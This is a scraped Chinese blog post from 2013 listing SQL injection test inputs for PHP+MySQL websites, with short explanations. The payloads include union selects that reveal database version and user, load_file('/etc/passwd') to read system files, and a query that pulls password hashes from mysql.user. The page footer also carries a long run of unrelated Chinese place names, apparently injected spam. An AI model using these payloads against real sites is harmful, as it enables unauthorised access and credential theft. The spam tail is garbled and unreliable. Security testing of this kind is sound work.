qileilove

          blog已經轉移至github,大家請訪問 http://qaseven.github.io/

          PHP+MySQL 網站 SQL 注入攻擊測試用例

          SQL注入攻擊測試用例

          說明

          Night
          Night’ and 1=1#
          Night’ and 1=2#

          判斷注入點。第一次是正常請求,如果存在注入漏洞,那么第二次請求得到結果應該與第一次一樣,并且第三次請求得到的結果應該與前兩次不同

          Night’ or 1=1#

          返回所有數據,常用于有搜索功能的頁面

          Night’ union select version()#

          返回數據庫版本信息

          Night’ union select database()#

          返回當前的庫名

          Night’ union select user()#

          返回數據庫的用戶名信息

          Night’ union select session_user()#

          Night’ union select system_user()#

          Night’ union select load_file(‘/etc/passwd’)#

          讀取系統文件

          Night’ select user ,password from mysql.user#

          返回數據庫用戶的密碼信息,密碼一般以MD5的方式存放

          posted on 2013-12-05 10:47 順其自然EVO 閱讀(304) 評論(0)  編輯  收藏


          只有注冊用戶登錄后才能發表評論。


          網站導航:
          博客園   IT新聞   Chat2DB   C++博客   博問  
           
          <2013年12月>
          24252627282930
          1234567
          891011121314
          15161718192021
          22232425262728
          2930311234

          導航

          統計

          常用鏈接

          留言簿(55)

          隨筆分類

          隨筆檔案

          文章分類

          文章檔案

          搜索

          最新評論

          閱讀排行榜

          評論排行榜

          主站蜘蛛池模板: 郴州市| 永昌县| 渑池县| 体育| 中方县| 安溪县| 张掖市| 星子县| 汽车| 左云县| 鹤山市| 镇远县| 西盟| 黄骅市| 外汇| 晴隆县| 江川县| 芒康县| 天全县| 丽江市| 聂荣县| 信阳市| 磐安县| 成武县| 西藏| 青铜峡市| 利川市| 乌兰察布市| 临洮县| 东海县| 哈密市| 桦甸市| 乐业县| 延长县| 伊春市| 达州市| 噶尔县| 丰宁| 新源县| 晋中市| 屯门区|